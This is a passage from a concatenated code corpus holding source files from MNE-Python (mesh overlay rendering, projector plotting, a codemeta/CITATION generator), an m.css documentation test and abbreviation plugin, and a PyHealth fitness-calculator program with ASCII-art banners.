rng[1] - rng[0] return (self._scalars - rng[0]) / factor class _LayeredMesh(object): def __init__(self, renderer, vertices, triangles, normals): self._renderer = renderer self._vertices = vertices self._triangles = triangles self._normals = normals self._polydata = None self._actor = None self._is_mapped = False self._current_colors = None self._cached_colors = None self._overlays = OrderedDict() self._default_scalars = np.ones(vertices.shape) self._default_scalars_name = 'Data' def map(self): kwargs = { "color": None, "pickable": True, "rgba": True, } mesh_data = self._renderer.mesh( x=self._vertices[:, 0], y=self._vertices[:, 1], z=self._vertices[:, 2], triangles=self._triangles, normals=self._normals, scalars=self._default_scalars, **kwargs ) self._actor, self._polydata = mesh_data self._is_mapped = True def _compute_over(self, B, A): assert A.ndim == B.ndim == 2 assert A.shape[1] == B.shape[1] == 4 A_w = A[:, 3:] # * 1 B_w = B[:, 3:] * (1 - A_w) C = A.copy() C[:, :3] *= A_w C[:, :3] += B[:, :3] * B_w C[:, 3:] += B_w C[:, :3] /= C[:, 3:] return np.clip(C, 0, 1, out=C) def _compose_overlays(self): B = cache = None for overlay in self._overlays.values(): A = overlay.to_colors() if B is None: B = A else: cache = B B = self._compute_over(cache, A) return B, cache def add_overlay(self, scalars, colormap, rng, opacity, name): overlay = _Overlay( scalars=scalars, colormap=colormap, rng=rng, opacity=opacity, name=name, ) self._overlays[name] = overlay colors = overlay.to_colors() if self._current_colors is None: self._current_colors = colors else: # save previous colors to cache self._cached_colors = self._current_colors self._current_colors = self._compute_over( self._cached_colors, colors) # apply the texture self._apply() def remove_overlay(self, names): to_update = False if not isinstance(names, list): names = [names] for name in names: if name in self._overlays: del self._overlays[name] to_update = True if to_update: self.update() def _apply(self): if self._current_colors is None or self._renderer is None: return self._renderer._set_mesh_scalars( mesh=self._polydata, scalars=self._current_colors, name=self._default_scalars_name, ) def update(self, colors=None): if colors is not None and self._cached_colors is not None: self._current_colors = self._compute_over( self._cached_colors, colors) else: self._current_colors, self._cached_colors = \ self._compose_overlays() self._apply() def _clean(self): mapper = self._actor.GetMapper() mapper.SetLookupTable(None) self._actor.SetMapper(None) self._actor = None self._polydata = None self._renderer = None def update_overlay(self, name, scalars=None, colormap=None, opacity=None, rng=None): overlay = self._overlays.get(name, None) if overlay is None: return if scalars is not None: overlay._scalars = scalars if colormap is not None: overlay._colormap = colormap if opacity is not None: overlay._opacity = opacity if rng is not None: overlay._rng = rng # partial update: use cache if possible if name == list(self._overlays.keys())[-1]: self.update(colors=overlay.to_colors()) else: # full update self.update() ``` #### File: mne/viz/conftest.py ```python import pytest import numpy as np import os.path as op from mne import create_info, EvokedArray, events_from_annotations, Epochs from mne.channels import make_standard_montage from mne.datasets.testing import data_path, _pytest_param from mne.io import read_raw_nirx from mne.preprocessing.nirs import optical_density, beer_lambert_law fname_nirx = op.join(data_path(download=False), 'NIRx', 'nirscout', 'nirx_15_2_recording_w_overlap') @pytest.fixture() def fnirs_evoked(): """Create an fnirs evoked structure.""" montage = make_standard_montage('biosemi16') ch_names = montage.ch_names ch_types = ['eeg'] * 16 info = create_info(ch_names=ch_names, sfreq=20, ch_types=ch_types) evoked_data = np.random.randn(16, 30) evoked = EvokedArray(evoked_data, info=info, tmin=-0.2, nave=4) evoked.set_montage(montage) evoked.set_channel_types({'Fp1': 'hbo', 'Fp2': 'hbo', 'F4': 'hbo', 'Fz': 'hbo'}, verbose='error') return evoked @pytest.fixture(params=[_pytest_param()]) def fnirs_epochs(): """Create an fnirs epoch structure.""" raw_intensity = read_raw_nirx(fname_nirx, preload=False) raw_od = optical_density(raw_intensity) raw_haemo = beer_lambert_law(raw_od, ppf=6.) evts, _ = events_from_annotations(raw_haemo, event_id={'1.0': 1}) evts_dct = {'A': 1} tn, tx = -1, 2 epochs = Epochs(raw_haemo, evts, event_id=evts_dct, tmin=tn, tmax=tx) return epochs ``` #### File: mne/viz/_proj.py ```python from copy import deepcopy import numpy as np from .evoked import _plot_evoked from .topomap import _plot_projs_topomap from .utils import plt_show, _check_type_projs from ..defaults import DEFAULTS from ..io.pick import _picks_to_idx from ..utils import _validate_type, warn, _pl, verbose @verbose def plot_projs_joint(projs, evoked, picks_trace=None, *, topomap_kwargs=None, show=True, verbose=None): """Plot projectors and evoked jointly. Parameters ---------- projs : list of Projection The projectors to plot. evoked : instance of Evoked The data to plot. Typically this is the evoked instance created from averaging the epochs used to create the projection. %(picks_plot_projs_joint_trace)s topomap_kwargs : dict | None Keyword arguments to pass to :func:`mne.viz.plot_projs_topomap`. %(show)s %(verbose)s Returns ------- fig : instance of matplotlib Figure The figure. Notes ----- This function creates a figure with three columns: 1. The left shows the evoked data traces before (black) and after (green) projection. 2. The center shows the topomaps associated with each of the projectors. 3. The right again shows the data traces (black), but this time with: 1. The data projected onto each projector with a single normalization factor (solid lines). This is useful for seeing the relative power in each projection vector. 2. The data projected onto each projector with individual normalization factors (dashed lines). This is useful for visualizing each time course regardless of its power. 3. Additional data traces from ``picks_trace`` (solid yellow lines). This is useful for visualizing the "ground truth" of the time course, e.g. the measured EOG or ECG channel time courses. .. versionadded:: 1.1 """ import matplotlib.pyplot as plt from ..evoked import Evoked _validate_type(evoked, Evoked, 'evoked') _validate_type(topomap_kwargs, (None, dict), 'topomap_kwargs') projs = _check_type_projs(projs) topomap_kwargs = dict() if topomap_kwargs is None else topomap_kwargs if picks_trace is not None: picks_trace = _picks_to_idx( evoked.info, picks_trace, allow_empty=False) info = evoked.info ch_types = evoked.get_channel_types(unique=True, only_data_chs=True) proj_by_type = dict() # will be set up like an enumerate key->[pi, proj] ch_names_by_type = dict() used = np.zeros(len(projs), int) for ch_type in ch_types: these_picks = _picks_to_idx(info, ch_type, allow_empty=True) these_chs = [evoked.ch_names[pick] for pick in these_picks] ch_names_by_type[ch_type] = these_chs for pi, proj in enumerate(projs): if not set(these_chs).intersection(proj['data']['col_names']): continue if ch_type not in proj_by_type: proj_by_type[ch_type] = list() proj_by_type[ch_type].append([pi, deepcopy(proj)]) used[pi] += 1 missing = (~used.astype(bool)).sum() if missing: warn(f'{missing} projector{_pl(missing)} had no channel names ' 'present in epochs') del projs ch_types = list(proj_by_type) # reduce to number we actually need # room for legend max_proj_per_type = max(len(x) for x in proj_by_type.values()) cs_trace = 3 cs_topo = 2 n_col = max_proj_per_type * cs_topo + 2 * cs_trace n_row = len(ch_types) shape = (n_row, n_col) fig = plt.figure(figsize=(n_col * 1.1 + 0.5, n_row * 1.8 + 0.5), constrained_layout=True) ri = 0 # pick some sufficiently distinct colors (6 per proj type, e.g., ECG, # should be enough hopefully!) # https://personal.sron.nl/~pault/data/colourschemes.pdf # "Vibrant" color scheme proj_colors = [ '#CC3311', # red '#009988', # teal '#0077BB', # blue '#EE3377', # magenta '#EE7733', # orange '#33BBEE', # cyan ] trace_color = '#CCBB44' # yellow after_color, after_name = '#228833', 'green' type_titles = DEFAULTS['titles'] last_ax = [None] * 2 first_ax = dict() pe_kwargs = dict(show=False, draw=False) for ch_type, these_projs in proj_by_type.items(): these_idxs, these_projs = zip(*these_projs) ch_names = ch_names_by_type[ch_type] idx = np.where([np.in1d(ch_names, proj['data']['col_names']).all() for proj in these_projs])[0] used[idx] += 1 count = len(these_projs) for proj in these_projs: sub_idx = [proj['data']['col_names'].index(name) for name in ch_names] proj['data']['data'] = proj['data']['data'][:, sub_idx] proj['data']['col_names'] = ch_names ba_ax = plt.subplot2grid( shape, (ri, 0), colspan=cs_trace, fig=fig) topo_axes = [ plt.subplot2grid( shape, (ri, ci * cs_topo + cs_trace), colspan=cs_topo, fig=fig) for ci in range(count)] tr_ax = plt.subplot2grid( shape, (ri, n_col - cs_trace), colspan=cs_trace, fig=fig) # topomaps _plot_projs_topomap(these_projs, info=info, show=False, axes=topo_axes, **topomap_kwargs) for idx, proj, ax_ in zip(these_idxs, these_projs, topo_axes): ax_.set_title('') # could use proj['desc'] but it's long ax_.set_xlabel(f'projs[{idx}]', fontsize='small') unit = DEFAULTS['units'][ch_type] # traces this_evoked = evoked.copy().pick_channels(ch_names) p = np.concatenate([p['data']['data'] for p in these_projs]) assert p.shape == (len(these_projs), len(this_evoked.data)) traces = np.dot(p, this_evoked.data) traces *= np.sign(np.mean( np.dot(this_evoked.data, traces.T), 0))[:, np.newaxis] if picks_trace is not None: ch_traces = evoked.data[picks_trace] ch_traces -= np.mean(ch_traces, axis=1, keepdims=True) ch_traces /= np.abs(ch_traces).max() _plot_evoked(this_evoked, picks='all', axes=[tr_ax], **pe_kwargs) for line in tr_ax.lines: line.set(lw=0.5, zorder=3) for t in list(tr_ax.texts): t.remove() scale = 0.8 * np.abs(tr_ax.get_ylim()).max() hs, labels = list(), list() traces /= np.abs(traces).max() # uniformly scaled for ti, trace in enumerate(traces): hs.append(tr_ax.plot( this_evoked.times, trace * scale, color=proj_colors[ti % len(proj_colors)], zorder=5)[0]) labels.append(f'projs[{these_idxs[ti]}]') traces /= np.abs(traces).max(1, keepdims=True) # independently for ti, trace in enumerate(traces): tr_ax.plot( this_evoked.times, trace * scale, color=proj_colors[ti % len(proj_colors)], zorder=3.5, ls='--', lw=1., alpha=0.75) if picks_trace is not None: trace_ch = [evoked.ch_names[pick] for pick in picks_trace] if len(picks_trace) == 1: trace_ch = trace_ch[0] hs.append(tr_ax.plot( this_evoked.times, ch_traces.T * scale, color=trace_color, lw=3, zorder=4, alpha=0.75)[0]) labels.append(str(trace_ch)) tr_ax.set(title='', xlabel='', ylabel='') # This will steal space from the subplots in a constrained layout # https://matplotlib.org/3.5.0/tutorials/intermediate/constrainedlayout_guide.html#legends # noqa: E501 tr_ax.legend( hs, labels, loc='center left', borderaxespad=0.05, bbox_to_anchor=[1.05, 0.5]) last_ax[1] = tr_ax key = 'Projected time course' if key not in first_ax: first_ax[key] = tr_ax # Before and after traces _plot_evoked(this_evoked, picks='all', axes=[ba_ax], **pe_kwargs) for line in ba_ax.lines: line.set(lw=0.5, zorder=3) loff = len(ba_ax.lines) this_proj_evoked = this_evoked.copy().add_proj(these_projs) # with meg='combined' any existing mag projectors (those already part # of evoked before we add_proj above) will have greatly # reduced power, so we ignore the warning about this issue this_proj_evoked.apply_proj(verbose='error') _plot_evoked(this_proj_evoked, picks='all', axes=[ba_ax], **pe_kwargs) for line in ba_ax.lines[loff:]: line.set(lw=0.5, zorder=4, color=after_color) for t in list(ba_ax.texts): t.remove() ba_ax.set(title='', xlabel='') ba_ax.set(ylabel=f'{type_titles[ch_type]}\n{unit}') last_ax[0] = ba_ax key = f'Before (black) and after ({after_name})' if key not in first_ax: first_ax[key] = ba_ax ri += 1 for ax in last_ax: ax.set(xlabel='Time (sec)') for title, ax in first_ax.items(): ax.set_title(title, fontsize='medium') plt_show(show) return fig ``` #### File: mne-python/tools/generate_codemeta.py ```python import os import subprocess from datetime import date from mne import __version__ as release_version # NOTE: ../codemeta.json and ../citation.cff should not be continuously # updated. Run this script only at release time. package_name = 'MNE-Python' hard_dependencies = ('numpy', 'scipy') release_date = str(date.today()) commit = subprocess.run(['git', 'log', '-1', '--pretty=%H'], capture_output=True, text=True).stdout.strip() # KEYWORDS keywords = ( 'MEG', 'magnetoencephalography', 'EEG', 'electroencephalography', 'fNIRS', 'functional near-infrared spectroscopy', 'iEEG', 'intracranial EEG', 'eCoG', 'electrocorticography', 'DBS', 'deep brain stimulation' ) # add to these as necessary compound_surnames = ( '<NAME>', '<NAME>', '<NAME>', '<NAME>', 'de <NAME>orre', 'de Montalivet', '<NAME>', '<NAME>', '<NAME>', '<NAME>', '<NAME>', '<NAME>', ) def parse_name(name): """Split name blobs from `git shortlog -nse` into first/last/email.""" # remove commit count _, name_and_email = name.strip().split('\t') name, email = name_and_email.split(' <') email = email.strip('>') email = '' if 'noreply' in email else email # ignore "noreply" emails name = ' '.join(name.split('.')) # remove periods from initials # handle compound surnames for compound_surname in compound_surnames: if name.endswith(compound_surname): ix = name.index(compound_surname) first = name[:ix].strip() last = compound_surname return (first, last, email) # handle non-compound surnames name_elements = name.split() if len(name_elements) == 1: # mononyms / usernames first = '' last = name else: first = ' '.join(name_elements[:-1]) last = name_elements[-1] return (first, last, email) # MAKE SURE THE RELEASE STRING IS PROPERLY FORMATTED try: split_version = list(map(int, release_version.split('.'))) except ValueError: raise msg = f'version string must be X.Y.Z (all integers), got {release_version}' assert len(split_version) == 3, msg # RUN GIT SHORTLOG TO GET ALL AUTHORS, SORTED BY NUMBER OF COMMITS args = ['git', 'shortlog', '-nse'] result = subprocess.run(args, capture_output=True, text=True) lines = result.stdout.strip().split('\n') all_names = [parse_name(line) for line in lines] # CONSTRUCT JSON AUTHORS LIST json_authors = [f'''{{ "@type":"Person", "email":"{email}", "givenName":"{first}", "familyName": "{last}" }}''' for (first, last, email) in all_names] # GET OUR DEPENDENCY VERSIONS with open(os.path.join('..', 'setup.py'), 'r') as fid: for line in fid: if line.strip().startswith('python_requires='): version = line.strip().split('=', maxsplit=1)[1].strip("'\",") dependencies = [f'python{version}'] break with open(os.path.join('..', 'requirements.txt'), 'r') as fid: for line in fid: req = line.strip() for hard_dep in hard_dependencies: if req.startswith(hard_dep): dependencies.append(req) # these must be done outside the boilerplate (no \n allowed in f-strings): json_authors = ',\n '.join(json_authors) dependencies = '",\n "'.join(dependencies) json_keywords = '",\n "'.join(keywords) # ASSEMBLE COMPLETE JSON codemeta_boilerplate = f'''{{ "@context": "https://doi.org/10.5063/schema/codemeta-2.0", "@type": "SoftwareSourceCode", "license": "https://spdx.org/licenses/BSD-3-Clause", "codeRepository": "git+https://github.com/mne-tools/mne-python.git", "dateCreated": "2010-12-26", "datePublished": "2014-08-04", "dateModified": "{release_date}", "downloadUrl": "https://github.com/mne-tools/mne-python/archive/v{release_version}.zip", "issueTracker": "https://github.com/mne-tools/mne-python/issues", "name": "{package_name}", "version": "{release_version}", "description": "{package_name} is an open-source Python package for exploring, visualizing, and analyzing human neurophysiological data. It provides methods for data input/output, preprocessing, visualization, source estimation, time-frequency analysis, connectivity analysis, machine learning, and statistics.", "applicationCategory": "Neuroscience", "developmentStatus": "active", "referencePublication": "https://doi.org/10.3389/fnins.2013.00267", "keywords": [ "{json_keywords}" ], "programmingLanguage": [ "Python" ], "operatingSystem": [ "Linux", "Windows", "macOS" ], "softwareRequirements": [ "{dependencies}" ], "author": [ {json_authors} ] }} ''' # noqa E501 # WRITE TO FILE with open(os.path.join('..', 'codemeta.json'), 'w') as codemeta_file: codemeta_file.write(codemeta_boilerplate) # # # # # # # # # # # # # # # # GENERATE CITATION.CFF TOO # # # # # # # # # # # # # # # # message = ('If you use this software, please cite both the software itself, ' 'and the paper listed in the preferred-citation field.') # in CFF, multi-word keywords need to be wrapped in quotes cff_keywords = (f'"{kw}"' if ' ' in kw else kw for kw in keywords) # make into a bulleted list cff_keywords = '\n'.join(f' - {kw}' for kw in cff_keywords) # TODO: someday would be nice to include ORCiD identifiers too cff_authors = [f' - family-names: {last}\n given-names: {first}' if first else f' - name: {last}' for (first, last, _) in all_names] cff_authors = '\n'.join(cff_authors) # this ↓↓↓ is the meta-DOI that always resolves to the latest release zenodo_doi = '10.5281/zenodo.592483' # ASSEMBLE THE CFF STRING cff_boilerplate = f'''\ cff-version: 1.2.0 title: "{package_name}" message: "{message}" version: {release_version} date-released: "{release_date}" commit: {commit} doi: {zenodo_doi} keywords: {cff_keywords} authors: {cff_authors} preferred-citation: title: "MEG and EEG Data Analysis with MNE-Python" journal: "Frontiers in Neuroscience" type: article year: 2013 volume: 7 issue: 267 start: 1 end: 13 doi: 10.3389/fnins.2013.00267 authors: - family-names: Gramfort given-names: Alexandre - family-names: Luessi given-names: Martin - family-names: Larson given-names: Eric - family-names: Engemann given-names: <NAME>. - family-names: Strohmeier given-names: Daniel - family-names: Brodbeck given-names: Christian - family-names: Goj given-names: Roman - family-names: Jas given-names: Mainak - family-names: Brooks given-names: Teon - family-names: Parkkonen given-names: Lauri - family-names: Hämäläinen given-names: <NAME>. ''' # WRITE TO FILE with open(os.path.join('..', 'CITATION.cff'), 'w') as cff_file: cff_file.write(cff_boilerplate) ```
{ "source": "0rganizers/m.css", "score": 2 }
#### File: documentation/test_python/test_link_formatting.py ```python import os import unittest from typing import List from . import BaseInspectTestCase from python import EntryType, default_id_formatter from _search import searchdata_format_version def custom_url_formatter(type: EntryType, path: List[str]) -> str: if type == EntryType.CLASS: filename = 'c.' + '.'.join(path) + '.html' elif type == EntryType.MODULE: filename = 'm.' + '.'.join(path) + '.html' elif type == EntryType.PAGE: filename = 'p.' + '.'.join(path) + '.html' elif type == EntryType.SPECIAL: filename = 's.' + '.'.join(path) + '.html' elif type == EntryType.STATIC: assert len(path) == 1 url = os.path.basename(path[0]) # Encode version information into the search driver if url == 'search.js': url = 'search-v{}.js'.format(searchdata_format_version) # Everything except the search data (which don't exist yet) should be # absolute if url != 'absolutesearchdata-v{}.bin'.format(searchdata_format_version): assert os.path.isabs(path[0]) and os.path.exists(path[0]), path[0] filename = 't.' + url else: assert False return filename, filename + "#this-is-an-url" def custom_id_formatter(type: EntryType, path: List[str]) -> str: if type == EntryType.FUNCTION: return 'f-' + '-'.join(path) if type == EntryType.OVERLOADED_FUNCTION: # Reuse the original hasher so we can test its behavior return 'o-' + default_id_formatter(type, path) if type == EntryType.PROPERTY: return 'p-' + '-'.join(path) if type == EntryType.ENUM: return 'e-' + '-'.join(path) if type == EntryType.ENUM_VALUE: return 'v-' + '-'.join(path) if type == EntryType.DATA: return 'd-' + '-'.join(path) assert False class LinkFormatting(BaseInspectTestCase): def test(self): self.run_python({ 'INPUT_PAGES': ['page.rst'], 'URL_FORMATTER': custom_url_formatter, 'ID_FORMATTER': custom_id_formatter, 'PLUGINS': ['m.images'], 'LINKS_NAVBAR1': [ ('Pages', 'pages', []), ('Modules', 'modules', []), ('Classes', 'classes', [])], 'LINKS_NAVBAR2': [('A page', 'page', []), ('A module', 'link_formatting', []), ('The class', ['link_formatting', 'Class'], [])], 'FAVICON': 'favicon-light.png', 'SEARCH_DISABLED': False, # to test search link formatting, too 'SEARCH_HELP': 'blub?', 'SEARCH_DOWNLOAD_BINARY': 'absolutesearchdata-v{}.bin'.format(searchdata_format_version), 'PYBIND11_COMPATIBILITY': True }) self.assertEqual(*self.actual_expected_contents('m.link_formatting.html')) self.assertEqual(*self.actual_expected_contents('m.link_formatting.sub.html')) self.assertEqual(*self.actual_expected_contents('c.link_formatting.Class.html')) self.assertEqual(*self.actual_expected_contents('c.link_formatting.Class.Sub.html')) self.assertEqual(*self.actual_expected_contents('p.page.html')) self.assertEqual(*self.actual_expected_contents('s.classes.html')) self.assertEqual(*self.actual_expected_contents('s.modules.html')) self.assertEqual(*self.actual_expected_contents('s.pages.html')) # There's nothing inside s.index.html that wouldn't be already covered # by others self.assertTrue(os.path.exists(os.path.join(self.path, 'output/s.index.html'))) # Verify pybind11 overloaded function hashing as well self.assertEqual(*self.actual_expected_contents('m.link_formatting.pybind.html')) self.assertEqual(*self.actual_expected_contents('c.link_formatting.pybind.Foo.html')) # Static data self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.favicon-light.png'))) self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.m-dark+documentation.compiled.css'))) self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.search-v{}.js'.format(searchdata_format_version)))) self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.absolutesearchdata-v{}.bin'.format(searchdata_format_version)))) self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.tiny.png'))) ``` #### File: plugins/m/abbr.py ```python import re from docutils import nodes, utils from docutils.parsers import rst from docutils.parsers.rst.roles import set_classes # to avoid dependencies, link_regexp and parse_link() is common for m.abbr, # m.gh, m.gl, m.link and m.vk link_regexp = re.compile(r'(?P<title>.*) <(?P<link>.+)>') def parse_link(text): link = utils.unescape(text) m = link_regexp.match(link) if m: return m.group('title', 'link') return None, link def abbr(name, rawtext, text, lineno, inliner, options={}, content=[]): abbr, title = parse_link(text) set_classes(options) if not abbr: return [nodes.abbreviation(title, title, **options)], [] return [nodes.abbreviation(abbr, abbr, title=title, **options)], [] def register_mcss(**kwargs): rst.roles.register_local_role('abbr', abbr) register = register_mcss # for Pelican ```
{ "source": "0rion5/PyHealth", "score": 3 }
#### File: 0rion5/PyHealth/PyHealth.py ```python class PyHealth: """This class initializes 5 methods used for calculating health and fitness metrics""" def __init__(self): self.data= [] def basal_metabolic_rate(): import BasalMetabolicRate BasalMetabolicRate.setup() BasalMetabolicRate.main() main_menu= setup() return main_menu def body_mass_index(): import BodyMassIndex BMI= BodyMassIndex.main() return round(BMI, 2) def one_rep_max(): import OneRepMax upper_rm= OneRepMax.OneRepMax.upper(int(input("Upper Body 4-6 Rep Max in kg: "))) lower_rm= OneRepMax.OneRepMax.lower(int(input("Lower Body 4-6 Rep Max in kg: "))) print("\nYour recommended upper is: {}\nYour recommended lower is: {}\n".format(round(upper_rm),round(lower_rm))) return [upper_rm, lower_rm] def target_heart_rate(): import TargetHeartRate return TargetHeartRate.main() def vo2max(): """Gets vo2 max class from module and returns estimated vo2max """ import Vo2Max age= int(input("Enter Age: ")) gender = input("Gender m/f: ") if gender[0::].lower() == 'm': gender= 1 elif gender[0::].lower() == 'f': gender = 0 weight = float(input("weight in lbs: ")) walk_time_mins = int(input("Enter walk time in mins: ")) heart_rate = int(input("Heart rate: ")) VO2max= Vo2Max.Vo2Max.vo2max(age, gender,weight,walk_time_mins, heart_rate) return VO2max #%% def menu(): while True: PyHealth_dict= { 1 : "Basal Metabolic Rate" , 2 : "Body Mass Index" , 3 : "One Rep Max" , 4 : "Target Heart Rate" , 5 : "Vo2 Max" } print("\nPyHealth Menu Options: ") print("(1) Basal Metabolic Rate\n(2) Body Mass Index\n(3) One Rep Max\n(4) Target Heart Rate\n(5) VO2 Max") option= int(input("Choose an option 1 to 5: ")) for key in list(PyHealth_dict): if key == option: result= PyHealth_dict[key] return result print(result) else: return menu() #%% def yes_no(user_input): option= lambda x: x[0:1].lower() while True: choice= option(user_input) if choice=='y': # Return yes return 'yes' elif choice=='n': # Return no return 'no' else: # Return yes_no() function return yes_no(input("Continue? Y/n: ")) #%% def main(): return setup() #%% def setup(): menu_option= menu() print("\nYou've chosen "+str(menu_option)) if yes_no(input("Would you like to continue? y/n: "))=="yes": runProgram = True while runProgram: try: if menu_option == "Basal Metabolic Rate": return PyHealth.basal_metabolic_rate() elif menu_option == "Body Mass Index": bmi= PyHealth.body_mass_index() return bmi elif menu_option == "One Rep Max": return PyHealth.one_rep_max() elif menu_option == "Target Heart Rate": return PyHealth.target_heart_rate() elif menu_option == "Vo2 Max": return PyHealth.vo2max() except KeyboardInterrupt: PyHealth.setup() else:setup() #%% def destroy(): import sys sys.exit() #%% def initialize(): import time time.sleep(0.1) print(" _ _ ") time.sleep(0.1) print(" _ _ | | | | _ _ ") time.sleep(0.1) print(" | || || | | || || | ") time.sleep(0.1) print(" =H| || || |========nnnn=============nnnn========| || || |H= ") time.sleep(0.1) print(" |_||_|| | | | | | | ||_||_| ") time.sleep(0.1) print(" |_| / | | \ |_| ") time.sleep(0.1) print(" | | | | ") time.sleep(0.1) print(" \ (_ /~~~\ _) / ") time.sleep(0.1) print(" \ \ ( '_' ) / / ") time.sleep(0.1) print(" \ )\ = /( / ") time.sleep(0.1) print(" \ (_) (_) / ") time.sleep(0.1) print(" \ / ~~~ \ / ") time.sleep(0.1) print(" ( ) ") time.sleep(0.1) print(" \ / ") time.sleep(0.1) print(" \ / ") time.sleep(0.1) print(" )==(O)==( ") time.sleep(0.1) print(" / \ /") time.sleep(0.1) print(" /____/ \____\ /") time.sleep(0.1) print(" / / \ \ /") time.sleep(0.1) print(" / / \ \ /") time.sleep(0.1) print(" ( ) ( ) ") time.sleep(0.1) print(" | | | | ") time.sleep(0.1) print(" | | | | ") time.sleep(0.1) print(" |___| |___| ") time.sleep(0.1) print(" (___) (___) ") time.sleep(0.1) print("======================================================================") time.sleep(0.1) print(" _____ _ _ _ _ _ ") time.sleep(0.1) print(" | __ \ | | | | | | | | | ") time.sleep(0.1) print(" | |__) | _| |__| | ___ __ _| | |_| |__ ") time.sleep(0.1) print(" | ___/ | | | __ |/ _ \/ _` | | __| '_ \ ") time.sleep(0.1) print(" | | | |_| | | | | __/ (_| | | |_| | | |") time.sleep(0.1) print(" |_| \__, |_| |_|\___|\__,_|_|\__|_| |_|") time.sleep(0.1) print(" __/ | ") time.sleep(0.1) print(" |___/ ") time.sleep(0.1) print("The programs included are free software;") time.sleep(0.3) print("the exact license terms for each program are described in the") time.sleep(0.3) print("individual files in /PyHealth/license.\n") time.sleep(0.3) print("Calculate your target heart rate with python.\n") time.sleep(0.3) print("This program uses the different methods of determining the health related calculatoins.\n") time.sleep(0.3) print("Acheive Goals Faster and increase performace with data you can use.") time.sleep(0.3) #%% # Program Starts Here try: if __name__ == "__main__": initialize() main() except KeyboardInterrupt: import sys sys.exit() ``` #### File: 0rion5/PyHealth/TargetHeartRate.py ```python def target_heart_rate_program_init(): import time print("________¶¶ ") time.sleep(0.1) print("____¶___¶¶¶ ") time.sleep(0.1) print("____¶¶¶_¶_¶¶¶ ") time.sleep(0.1) print("_____¶¶¶¶¶__¶¶ ") time.sleep(0.1) print("¶¶¶____¶¶¶¶__¶¶ ") time.sleep(0.1) print("_¶¶¶¶¶¶¶¶¶¶¶__¶¶ ") time.sleep(0.1) print("__¶¶¶_¶¶¶¶¶¶¶__¶¶ ") time.sleep(0.1) print("____¶¶_¶¶¶¶¶¶¶_¶¶ ") time.sleep(0.1) print("_____¶¶_¶¶¶¶¶¶¶¶¶___________¶¶¶¶¶ ") time.sleep(0.1) print("_______¶¶¶¶¶¶¶¶¶¶_________¶¶¶¶_¶¶¶¶ ") time.sleep(0.1) print("________¶¶¶¶¶¶¶¶¶_______¶¶¶_______¶¶ ") time.sleep(0.1) print("_____________¶¶¶¶¶_____¶¶¶___¶¶____¶¶ ") time.sleep(0.1) print("_______________¶¶¶¶___¶¶¶__¶¶¶¶¶____¶¶ ") time.sleep(0.1) print("_________________¶¶¶_¶¶¶__¶¶___¶¶___¶¶¶ ") time.sleep(0.1) print("__________________¶¶¶¶___¶¶_____¶____¶¶ ") time.sleep(0.1) print("___________________¶¶¶¶_¶¶______¶¶___¶¶ ") time.sleep(0.1) print("___________________¶¶¶¶¶¶___¶¶__¶¶___¶¶ ") time.sleep(0.1) print("___________________¶_¶¶¶¶__¶¶¶__¶¶___¶¶ ") time.sleep(0.1) print("__________________¶¶__¶¶¶¶¶__¶__¶¶___¶¶ ") time.sleep(0.1) print("__________________¶¶__¶_¶¶¶¶_¶__¶¶__¶¶¶ ") time.sleep(0.1) print("__________________¶__¶¶_¶¶¶¶¶¶__¶¶__¶¶¶ ") time.sleep(0.1) print("_________________¶¶__¶¶_¶¶__¶¶__¶¶__¶¶¶ ") time.sleep(0.1) print("_________________¶¶__¶¶_¶¶__¶¶__¶¶__¶¶¶ ") time.sleep(0.1) print("_________________¶¶__¶¶_¶¶_¶¶__¶¶___¶¶¶ ") time.sleep(0.1) print("_________________¶¶__¶¶__¶_¶___¶¶__¶¶¶ ") time.sleep(0.1) print("_________________¶¶__¶¶__¶¶___¶¶___¶¶¶ ") time.sleep(0.1) print("_________________¶¶__¶_______¶¶___¶¶¶ ") time.sleep(0.1) print("_________________¶¶__¶¶_____¶¶____¶¶¶ ") time.sleep(0.1) print("__________________¶__¶¶____¶¶____¶¶¶ ") time.sleep(0.1) print("__________________¶¶__¶¶¶¶¶____¶¶¶¶ ") time.sleep(0.1) print("__________________¶¶_________¶¶¶¶¶ ") time.sleep(0.1) print("___________________¶¶______¶¶¶¶¶ ") time.sleep(0.1) print("____________________¶¶¶¶¶¶¶¶¶¶ ") time.sleep(0.1) print("______________________¶¶¶¶¶¶ ") time.sleep(0.1) print(" _______ _ _ _ _ ") time.sleep(0.3) print("|__ __| | | | | | | | | ") time.sleep(0.3) print(" | | __ _ _ __ __ _ ___| |_ | |__| | ___ __ _ _ __| |_ ") time.sleep(0.3) print(" | |/ _` | '__/ _` |/ _ \ __| | __ |/ _ \/ _` | '__| __|") time.sleep(0.3) print(" | | (_| | | | (_| | __/ |_ | | | | __/ (_| | | | |_ ") time.sleep(0.3) print(" __|_|\__,_|_| \__, |\___|\__| |_| |_|\___|\__,_|_| \__|") time.sleep(0.3) print("| __ \ | | __/ | ") time.sleep(0.3) print("| |__) |__ _| |_|___/ ") time.sleep(0.3) print("| _ // _` | __/ _ \ ") time.sleep(0.3) print("| | \ \ (_| | || __/ ") time.sleep(0.3) print("|_| \_\__,_|\__\___| ") time.sleep(0.3) print(" ") low = range(1, 62) medium = range(62, 75) high = range(75, 101) intensity_dict= { low : "low intensity" , medium : "medium intensity", high : "high intensity" } class TargetHeartRate: """ This Class Calculates the target heart rate using two different methods """ # Class methods to call from other programs when importing hr_max= lambda age,percent: (220-age)*percent//100 karvonen_hr= lambda age, restingHR, percentage: (((220-age) - restingHR)*percentage//100) + restingHR # HRmax Method def hrmax(age, percent): """ Using HRmax to determine Exercise intensity provides an estimation of how hard the end user should exercise. In general, research shows that an appropriate range of recommended exercise intensity falls between 55% and 90% of HRmax """ # define heart rate maximum HRmax= 220-age # return the target heart rate return HRmax*percent//100 # Karvonen method def karvonen(age, HRresting, percent): """ This function uses the Karvonen method of determining the optimal target heart rate. As compared to HRmax, for which the range is 55% to 90%, when using this method to determine intensity, targetHRs during cardiorespiratory training should fall between 50% to 85% of HRR. this is to Ensure the target HR is not overestimated """ # define heart rate maximum HRmax = 207-(0.7*age) global HRreserve HRreserve = round(HRmax - HRresting) # return the target heart rate return round(((HRmax - HRresting)*percent//100) + HRresting) def heart_rate_reserve(age, HRresting): HRmax = 220-age return HRmax - HRresting # Get VO2 Max def vo2_max(age,resting_hr ): """ Vo2 Max = 15.3 x 